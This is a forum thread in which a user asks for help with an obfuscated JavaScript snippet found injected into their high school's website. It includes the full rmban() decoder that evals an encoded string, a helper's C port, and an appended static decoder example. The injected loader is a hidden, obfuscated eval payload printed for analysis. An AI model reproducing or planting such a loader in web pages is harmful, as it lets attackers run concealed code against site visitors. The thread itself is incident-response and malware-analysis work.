Help me figure this out please!!

ed5480, Join Date: Mar 2009
Newbie Member
I found this on my website and I don't know what it does or how it got there. If anyone can help me try and figure this thing out please let me know.
Code:
<script language=JavaScript>

function rmban(x)
{var l=x.length,
b=1024,
i,j,r,
p=0,s=0,w=0,
t=Array(63,25,62,40,29,60,55,10,30,32,0,0,0,0,0,0,3,0,31,23,16,36,54,50,8,51,44,53,5
 6,21,28,14,47,4,58,49,39,57,35,7,48,27,13,0,0,0,0,18,0,5,2,52,22,17,26,41,33,20,
12,43,45,19,6,24,46,11,42,9,1,37,38,15,59,34,61);

for(j=Math.ceil(l/b);j>0;j--)
{r='';
for(i=Math.min(l,b);i>0;i--,l--)
{{w|=(t[x.charCodeAt(p++)-48])<<s;
if(s){r+=String.fromCharCode(149^w&255);
w>>=8;s-=2}
else{s=6}
}
}
eval(r);
}
}
rmban('yI02SkPLxf8LcWOLvVrJek02XqkkSkPz9Vw5xW2pyBO0h@BPGv70IBOzL@Blxmw2XV7zV_wkICkU
 TYwr6FBLhC2kRrq3y6w5XT0pRBp5Rnppr7kPomBLzPxUR@22S6qFcW80x8OzxWP2L6qP0_f3VF735RkJ
 cw7zJOPJ27xlK7O0SW803nf39dY0XIP5zWOrvfflvWOxU@wr6nw0vC82cI2kxk02XBxrgrq0IBOzL@0r
GGq')
</script>
<!-- 205.178.132.155 -->
xpi0t0s, Join Date: Aug 2004
Mentor
Well it could do absolutely anything. It's clear it's been severely obfuscated.
So if you delete it on the grounds that it must have been obfuscated for a reason, and that probably wasn't a good reason since whoever put it there did so without your knowledge, I would suggest just deleting it. If it reappears raise it with your ISP, maybe it's some advertising junk, especially if you've got a "free" (i.e. advert supported) hosting provider. Or maybe there's some lack of security on their part that they would want to know about, since it appears people can add what looks like potentially malicious code to any of their customers' websites.

"potentially malicious" because it's obfuscated and uncommented. If it were there for valid reasons it wouldn't be at least one of those.
ed5480, Join Date: Mar 2009
Newbie Member
The website belongs to my high school. It's our school's website and no one on the team that works on it knows JavaScript. The site is not hosted on a free server or anything like that. We want to know what it does. Based on the research I've done it seems like it may be encoding or decoding a PHP string to run on our server but we could be completely wrong. If anyone knows what this does PLEASE let us know. It has been removed from the site but we would like to figure out what it does and hopefully that will help us figure out where it came from and possibly why it's there. Thanks
xpi0t0s, Join Date: Aug 2004
Mentor
I can't figure out what it does. I've converted it to C and I think I've got it right but it just produces junk. There could be some nuance of JavaScript I'm not aware of that means I've got the conversion wrong, which isn't unlikely as I'm not a JavaScript expert, but I've tried a few things and nothing produces anything that looks meaningful.
Note that the Go4Expert parser will most likely add spaces to the long strings, as I think it has done with your original post. In this there are no spaces in x or t.
Also I've tweaked some of the code based on the actual length of x, e.g. as it's less than b, ceil(l/b) will be 1.
Code:
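#include <stdio.h>
#include <string.h>

int main(void)
{
	/* encoded string and lookup table as transcribed in this post */
	const char *x="yI02SkPLxf8LcWOLvVrJek02XqkkSkPz9Vw5xW2pyBO0h@BPGv70IBOzL@Blxmw2XV7zV_wkICkUTYwr6FBLhC2kRrq3y6w5XT0pRBp5Rnppr7kPomBLzPxUR@22S6qFcW80x8OzxWP2L6qP0_f3VF735RkJcw7zJOPJ27xlK7O0SW803nf39dY0XIP5zWOrvfflvWOxU@wr6nw0vC82cI2kxk02XBxrgrq0IBOzL@0rGGq";
	int t[]={63,25,62,40,29,60,55,10,30,32,0,0,0,0,0,0,3,0,31,23,16,36,54,50,8,51,44,53,5,6,21,28,14,47,4,58,49,39,57,35,7,48,27,13,0,0,0,0,18,0,5,2,52,22,17,26,41,33,20,12,43,45,19,6,24,46,11,42,9,1,37,38,15,59,34,61};
	int l=(int)strlen(x);
	int b=1024,i,j;	/* b is the block size of the script; unused here because l < b */
	int w=0,s=0,p=0;
	(void)b;
	for (j=1/*ceil(l/b)*/; j>0; j--)
	{
		char r[1024];
		int rptr=0;
		r[rptr]=0;
		for (i=l; i>0; i--)
		{
			/* look up the next character and add its bits at offset s */
			w|=(t[(x[p++]-48)])<<s;
			if(s)
			{
				/* emit the low byte XORed with 149, then drop it */
				r[rptr++]=(char)(149^w&255);
				r[rptr]=0;
				w>>=8;
				s-=2;
			}
			else{s=6;}
		}
		/* print what the script would have passed to eval() */
		printf("eval('%s')\n",r);
	}
	return 0;
}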
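
Added example, not part of the thread or either poster's code: a JavaScript re-implementation of rmban() that returns the decoded text instead of passing it to eval(), so the payload can be read without running it. It assumes the table entry that the post shows split as "5 6" is the single value 56; with that reading the 64 characters 0-9, @, A-Z, _ and a-z map onto 64 distinct values, which the 5,6 reading does not, and isOneToOne() checks exactly that. The names TABLE, ALPHABET, PAYLOAD, isOneToOne and decode are this example's own.

```javascript
// Added example: decode the rmban() argument statically; eval() is replaced by a return.
// Lookup table from the post, indexed by (char code - 48).
// Assumption: the entry shown as "5 6" across a line break is the single value 56.
const TABLE = [63,25,62,40,29,60,55,10,30,32,0,0,0,0,0,0,3,0,31,23,16,36,54,50,8,
  51,44,53,56,21,28,14,47,4,58,49,39,57,35,7,48,27,13,0,0,0,0,18,0,5,2,52,22,17,
  26,41,33,20,12,43,45,19,6,24,46,11,42,9,1,37,38,15,59,34,61];
// The 64 characters whose table slots carry a value (the other slots are filler).
const ALPHABET = "0123456789@ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz";
// Encoded string from the post, with the spaces the forum inserted removed.
const PAYLOAD =
  "yI02SkPLxf8LcWOLvVrJek02XqkkSkPz9Vw5xW2pyBO0h@BPGv70IBOzL@Blxmw2XV7zV_wkICkU" +
  "TYwr6FBLhC2kRrq3y6w5XT0pRBp5Rnppr7kPomBLzPxUR@22S6qFcW80x8OzxWP2L6qP0_f3VF735RkJ" +
  "cw7zJOPJ27xlK7O0SW803nf39dY0XIP5zWOrvfflvWOxU@wr6nw0vC82cI2kxk02XBxrgrq0IBOzL@0r" +
  "GGq";

// True when the table maps the 64 alphabet characters onto 64 distinct 6-bit values.
// A mistranscribed table fails this check before any decoding is attempted.
function isOneToOne(table) {
  const values = new Set([...ALPHABET].map((ch) => table[ch.charCodeAt(0) - 48]));
  return values.size === 64 &&
    [...values].every((v) => Number.isInteger(v) && v >= 0 && v < 64);
}

// Same bit handling as rmban(): each character adds 6 bits (low bits first) and
// each completed byte is XORed with 149. rmban() evals every 1024-character
// block; here the whole result is returned as inert text instead.
function decode(x, table = TABLE) {
  if (!isOneToOne(table)) throw new Error("table is not a one-to-one mapping");
  let out = "", w = 0, s = 0;
  for (const ch of x) {
    if (!ALPHABET.includes(ch)) throw new Error("unexpected character: " + JSON.stringify(ch));
    w |= table[ch.charCodeAt(0) - 48] << s;
    if (s) {
      out += String.fromCharCode(149 ^ (w & 255));
      w >>= 8;
      s -= 2;
    } else {
      s = 6;
    }
  }
  return out;
}

// Print the script text as a quoted literal so control characters stay visible.
console.log(JSON.stringify(decode(PAYLOAD)));
```

Run it under Node rather than in a browser; the output is the script text that the injected snippet would have handed to eval().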